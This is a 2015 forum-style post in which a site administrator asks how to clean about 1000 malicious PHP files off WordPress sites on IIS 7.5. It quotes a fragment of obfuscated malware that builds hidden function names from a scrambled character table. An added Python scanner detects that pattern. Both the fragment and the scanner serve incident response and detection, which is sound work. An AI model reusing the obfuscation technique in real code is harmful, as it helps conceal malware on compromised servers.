Friday, March 20, 2015

Security issues IIS 7.5 with PHP 5.3



We are facing a lot of weird PHP files all over our WordPress websites on our IIS 7.5 server. The files look like XSS scripts, and maybe PHP code that the hacker uses to send spam emails or something else. We have around 1000 of the same file, and it has been working for 3 months.


Any idea how to kill these scripts and get the server back clean again?


Sample of this code:


H?3@\"X)<9yiu{S|p#T%YZR8mQ4]h(q:^BD~ALaEJ!Pw\r0tv'-G6z,oN_[KeOC 2Fs+Mj5\nrdW*\tkf}\x1g&;V\$bcI";
$GLOBALS['aonou50'] = $r42[67].$r42[79].$r42[79].$r42[62].$r42[79].$r42[64].$r42[79].$r42[67].$r42[24].$r42[62].$r42[79].$r42[54].$r42[19].$r42[7].$r42[90];
$GLOBALS['rmyuf73'] = $r42[19].$r42[7].$r42[19].$r42[64].$r42[73].$r42[67].$r42[54];
$GLOBALS['jpyvd6'] = $r42[80].$r42[67].$r42[85].$r42[19].$r42[7].$r42[67];
$GLOBALS['zdcfr88'] = $r42[7].$r42[24].$r42[20].$r42[19].$r42[24].$r42[59].$r42[77];
$GLOBALS['objwf19'] = $r42[79].$r42[76].$r42[38].$r42[95].$r42[62].$r42[59].$r42[77];
$GLOBALS['sslhr82'] = $r42[32].$r42[80].$r42[77];
$GLOBALS['drfep85'] = $r42[96].$r42[62].$r42[20].$r42[7].$r42[54];
$GLOBALS['fosip69'] = $r42[54].$r42[19].$r42[32].$r42[67];
$GLOBALS['mqaeu21'] = $r42[96].$r42[62].$r42[7].$r42[73].$r42[54].$r42[46].$r42[7].$r42[54];
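
An added example, not part of the original post: a Python scanner that flags .php files containing the pattern visible in the sample, `$GLOBALS` entries assembled character by character from a single lookup array. The function names and the threshold of three chains per file are assumptions.

```python
import os
import re
import tempfile

# One obfuscated assignment: $GLOBALS['key'] = $tbl[67].$tbl[79].$tbl[79];
# The back-reference (?P=tbl) requires every piece to index the same table.
CHAIN = re.compile(
    r"\$GLOBALS\[\s*['\"](?P<key>\w+)['\"]\s*\]\s*=\s*"
    r"\$(?P<tbl>\w+)\[\d+\](?:\s*\.\s*\$(?P=tbl)\[\d+\]){2,}\s*;"
)

def find_chains(php_source):
    """Return the $GLOBALS keys built from index-concatenation chains."""
    return [m.group("key") for m in CHAIN.finditer(php_source)]

def scan_tree(root, threshold=3):
    """Map path -> keys for .php files holding at least `threshold` chains.
    The threshold is an assumed starting point, not a value from the post."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="latin-1") as fh:  # never fails to decode
                    keys = find_chains(fh.read())
            except OSError:
                continue  # unreadable file: skip it, keep sweeping
            if len(keys) >= threshold:
                hits[path] = keys
    return hits

# Four statements copied from the posted sample, wrapped in constructed PHP tags.
SAMPLE = """<?php
$GLOBALS['rmyuf73'] = $r42[19].$r42[7].$r42[19].$r42[64].$r42[73].$r42[67].$r42[54];
$GLOBALS['jpyvd6'] = $r42[80].$r42[67].$r42[85].$r42[19].$r42[7].$r42[67];
$GLOBALS['sslhr82'] = $r42[32].$r42[80].$r42[77];
$GLOBALS['fosip69'] = $r42[54].$r42[19].$r42[32].$r42[67];
?>"""
# Constructed benign file: a plain $GLOBALS write and mixed-array concatenation.
CLEAN = "<?php $GLOBALS['wp_version'] = '4.1'; echo $a[0].$b[1].$a[2]; ?>"

def demo():
    """Write both samples to a temp tree and return the flagged file names."""
    with tempfile.TemporaryDirectory() as root:
        for name, body in (("dropper.php", SAMPLE), ("index.php", CLEAN)):
            with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
                fh.write(body)
        return sorted(os.path.basename(p) for p in scan_tree(root))
```

Point `scan_tree` at the site root to list candidates for review; the pattern identifies this obfuscation style, so a match still needs a manual look before the file is removed.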




